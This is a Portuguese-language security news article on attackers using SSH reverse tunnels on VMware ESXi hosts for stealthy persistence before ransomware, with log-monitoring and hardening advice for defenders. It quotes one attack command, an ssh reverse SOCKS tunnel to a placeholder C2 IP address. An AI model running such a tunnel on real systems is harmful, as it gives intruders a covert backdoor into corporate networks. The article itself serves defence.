Os criminosos digitais que têm como alvo o VMware ESXi estão utilizando túneis SSH para garantir acesso furtivo e persistência nas redes corporativas. Essa estratégia permite explorar falhas conhecidas ou credenciais comprometidas para implantar ransomware de maneira eficaz, impactando organizações inteiras.
O VMware ESXi, fundamental em ambientes virtualizados, suporta múltiplas máquinas virtuais em um único servidor físico. No entanto, sua segurança frequentemente é negligenciada, tornando-o vulnerável a ataques que comprometem dados e interrompem negócios inteiros.
Estratégia: Abuso do serviço SSH
O ESXi vem com um serviço SSH integrado que permite aos administradores gerenciar remotamente o hipervisor. Contudo, os invasores aproveitam esse recurso para estabelecer conexões persistentes, mover-se lateralmente e implantar cargas maliciosas.
De acordo com a Sygnia, os criminosos configuram facilmente o tunelamento utilizando comandos nativos SSH ou ferramentas externas semelhantes. Por exemplo:
bashCopiarEditarssh –fN -R 127.0.0.1:<porta SOCKS> <usuário>@<endereço IP C2>
Como o ESXi raramente é reiniciado, o túnel serve como um backdoor estável e discreto para acesso contínuo.
Dificuldades no monitoramento de logs
Um dos principais desafios está na análise de logs do ESXi. Diferente de outros sistemas que consolidam registros em um único arquivo, o ESXi distribui informações entre múltiplos logs, dificultando a detecção de atividades maliciosas.
Notícias Relacionadas
Segurança cibernética
Ataques cibernéticos com MintsLoader distribuem StealC e BOINC
Descubra como o malware MintsLoader está sendo usado para distribuir StealC e BOINC, visando setores estratégicos na Europa e nos EUA. Saiba mais sobre as técnicas avançadas usadas pelos cibercriminosos.
Dados expostos
UnitedHealth atualiza para 190 milhões os afetados por ataque de ransomware
A UnitedHealth atualizou o número de pessoas afetadas pelo ataque de ransomware de 2024 para 190 milhões, quase dobrando a estimativa anterior, revelando o maior vazamento de dados de saúde da história dos EUA.
Os administradores devem monitorar arquivos críticos, como:
- /var/log/shell.log: comandos executados no shell do ESXi;
- /var/log/hostd.log: atividades administrativas e autenticações;
- /var/log/auth.log: tentativas de login e eventos de autenticação;
- /var/log/vobd.log: eventos gerais de sistema e segurança.
Além disso, hackers frequentemente apagam ou modificam logs para ocultar evidências, complicando ainda mais a investigação.
Recomendações para proteção
Para mitigar riscos, as organizações devem:
- Centralizar logs do ESXi via syslog;
- Integrar registros em sistemas de gerenciamento de eventos de segurança (SIEM);
- Monitorar regularmente a atividade SSH e reforçar regras de firewall.
A proatividade no gerenciamento de segurança é essencial para reduzir a exposição a ataques cada vez mais sofisticados e garantir a integridade das redes corporativas.
